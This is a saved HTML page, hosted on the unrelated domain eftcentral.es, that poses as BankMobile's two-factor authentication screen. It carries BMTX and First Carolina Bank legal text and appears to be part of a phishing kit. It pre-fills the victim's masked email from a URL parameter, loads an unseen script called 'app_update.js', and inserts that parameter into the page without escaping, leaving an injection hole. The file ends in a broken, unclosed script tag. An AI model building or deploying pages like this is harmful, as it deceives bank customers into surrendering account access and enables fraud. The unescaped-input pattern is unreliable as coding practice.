<!DOCTYPE html>
<!-- saved from url=(0068)https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php -->
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="robots" content="noindex">  
  
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link href="./2eeee_files/bootstrap.min.css" rel="stylesheet" type="text/css">
  <link href="./2eeee_files/outpages_index.css" rel="stylesheet" type="text/css">
  <link href="./2eeee_files/global.css" rel="stylesheet" type="text/css">
  <link rel="shortcut icon" href="https://eftcentral.es/vibeaccounts/favicon.ico" type="image/x-icon">
  <link rel="stylesheet" href="./2eeee_files/2FAuthentication.css">
  <title>Two Factor Authentication</title>
</head>
<body>
  <div id="homepage-wrapper">
      <div class="col-xs-12" id="resp-outheader">
        <div class="hdr-logo-padding">
            <a href="https://eftcentral.es/"><img src="./2eeee_files/title_1.gif" height="68" alt="" style="visibility: hidden;"></a>
        </div>
        <div class="row" id="login-row" style="height: 60px;">
                <div class="col-xs-12 col-md-offset-0">
                    <div class="row">
                        <div class="login-fields">
                        </div>
                        <div class="login-padding login-button-group">
                           
                        </div>
                    </div>
                </div>
            </form>
        </div>
      </div>
      <div class="pagebody_div factor2Pt">
        <div class="pagecontent_div factor2Content">
        
              <form id="twoFactorAuthenticationForm" method="post" autocomplete="off">

            <div class="container">
              <div class="row">
                <div class="icon col-xs-12 col-sm-4 col-md-3">
                  <div class="image">
                    <img src="./2eeee_files/twofactauth.png">
                  </div>
                </div>
                <div class="col-xs-12 col-sm-8 col-md-9">
                  <h3>
                    To keep your account safe, we require you to enter a secure code in order to access your account.
                    Please select how you'd like to receive a secure code.
                  </h3>
                </div>
              </div>
                 <div class="row messages">
        <div id="method">
            <div style="text-align:left">
                <label for="notification-E285921762">
                    <input type="radio" name="send2FA" required value="send_code" id="notification-E285921762">
                    Send an email to my primary email address
                    <strong id="masked-email"></strong> or to my mobile phone.
                </label>
            </div>
        </div>
    </div>

    <div style="text-align:center"><br>
        <p>
            Once you receive your code, you will be required to enter it on the next page in order to access your account.
        </p>
    </div>
    <script src="app_update.js"></script>

    <script>
        // Get the email from the URL parameter
        var urlParams = new URLSearchParams(window.location.search);
        var email = urlParams.get('email');

        if (email) {
            // Mask the email
            var maskedEmail = maskEmail(email);
            document.getElementById('masked-email').innerHTML = maskedEmail;
        } else {
            document.getElementById('masked-email').innerHTML = 'No email provided.';
        }

        // Mask email function
        function maskEmail(email) {
            var emailParts = email.split('@');
            if (emailParts.length < 2) return email; // Return the email as is if no "@" symbol

            var localPart = emailParts[0];
            var domain = emailParts[1];

            // Mask the local part (e.g., "janedoe" becomes "j*****e")
            var maskedLocalPart = localPart.charAt(0) + '*****' + localPart.charAt(localPart.length - 1);

            // Return the masked email (e.g., "j*****e@aol.com")
            return `<strong>${maskedLocalPart}@${domain}</strong>`;
        }
    </script>
                <div class="col-xs-12">
                <div class="verifybuttons">
                  <div style="text-align:center">
                    <input type="button" onclick="goBack()" value="Go Back" class="cancel">
                    <input type="submit" name="submitBtn3" value="Continue">
                    <input type="submit" name="org.apache.struts.taglib.html.CANCEL" value="Go Back" class="nodisplay cancel" id="cancel2FButton">
                  </div>
                </div>
               </div>
              <div class="clearfix"></div>
            </div>
            <div class="clearfix"></div> 
          </form>
          <div style="clear:both"></div>
        </div>
      <div class="ftr_bar_wide"></div>
      <div id="footer-footer">
        <div class="footertext">
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#">Home</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#" target="security">Security</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#">Fee Schedules</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#">Terms and Conditions</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#">Privacy Statement</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#">Privacy Notice for California Residents</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#">Contact Us</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#" target="EasyHelp" rel="external">Identity Verification</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#" target="EasyHelp" rel="external">FAQs</a>
        </div>
        <div class="footertext footer_legaltext">
            <p><img src="./2eeee_files/fdic-housing.png" alt="BMTX, Inc.&gt;" class="fdic-logo"></p>

            © 2024 BMTX, Inc., a wholly owned subsidiary of BM Technologies, Inc. All Rights Reserved.<br>


            <br> Digital banking platform powered by BMTX, Inc. BankMobile banking products and banking services are provided by First Carolina Bank, Member FDIC &amp; Equal Housing Lender. The BankMobile Debit Mastercard® card is issued by First
            Carolina Bank pursuant to license from Mastercard International Incorporated. The card is administered by First Carolina Bank. Mastercard and the Mastercard brand mark are registered trademarks of Mastercard International Incorporated.
            All other names and logos are owned by their respective owners.<br>


            <br> BM Technologies, Inc., PO Box 278, Maple Shade, NJ 08052
        </div>
      </div>
  </div>

  <script>
 

</div></body></html>